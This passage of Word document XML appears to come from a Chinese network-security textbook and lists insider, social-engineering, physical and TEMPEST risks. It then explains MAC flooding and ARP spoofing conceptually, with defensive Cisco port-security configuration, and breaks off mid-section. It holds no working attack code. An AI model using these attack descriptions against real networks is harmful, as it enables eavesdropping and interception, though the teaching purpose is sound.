      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内部威胁：离职员工删库（微盟事件）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AA6200" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>社工攻击：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CEO</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>欺诈（冒充领导要求转账）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247E9BDB" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>弱密码问题：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>password123</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仍被广泛使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282DD755" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>第三方风险：外包人员</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VPN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>账户泄露</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AAA941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 xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>物理层风险</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2BE022" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尾随进入：未授权进入机房</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4230B4" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设备窃取：笔记本电脑</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>移动硬盘失窃</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F532446" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>电磁泄露：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TEMPEST</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击截获屏幕辐射</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A3798C" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>网络协议攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017A9F11" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>泛洪攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58351349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攻击原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0731B5A2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MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>泛洪攻击利用交换机工作原理进行攻击：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1911CC30" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>交换机通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址表（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表）进行数据转发</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD31A16" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表有固定容量（通常</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1024-8192</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>条）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9CB739" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者伪造大量虚假源</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址的数据帧发送给交换机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2E01DC" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当虚假</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>条目超过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CAM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表容量时，交换机进入</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>失效开放</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020A5461" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在失效开放模式下，交换机退化为集线器，向所有端口广播数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6153BF97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危害</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E9E018" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据泄露：攻击者可嗅探网络中的所有通信</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B46DA32" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>拒绝服务：网络性能急剧下降甚至瘫痪</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682DBC6D" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中间人攻击：为后续</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>欺骗等攻击创造条件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA2A300" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全审计失效：破坏网络分段隔离策略</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23540514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防御措施</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69538E14" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口安全机制：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457E8FD9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 xml:space="preserve">switchport port-security        // </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>启用端口安全</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236157F8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 xml:space="preserve">switchport port-security maximum 2  // </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>限制</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68787A4A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 xml:space="preserve">switchport port-security violation restrict  // </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>违规时阻断</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F867BC" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>802.1X</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证：对接入设备进行身份验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B084FF" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>风暴控制：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EADB1F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 xml:space="preserve">storm-control broadcast level 50  // </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>限制广播流量</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>50%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E4D562" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>私有</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>VLAN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：隔离同一网段的主机通信</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DACF06" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:eastAsia="SimHei" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>欺骗攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C44C90D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攻击原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E1C4F1" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>协议无认证机制，局域网主机依赖</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414CF8D0" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者发送伪造</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应包：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F2244C" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="480" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向目标主机声明：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我是网关，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MAC]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24673E32" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:leftChars="200" w:left="480" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>向网关声明：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我是目标主机，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MAC]"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C9BBB0" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>受害主机更新错误</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ARP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>缓存</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01321945" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所有流量被重定向到攻击者主机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0026BB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攻击过程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DADCC0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>正常通信：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5153B10D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 xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
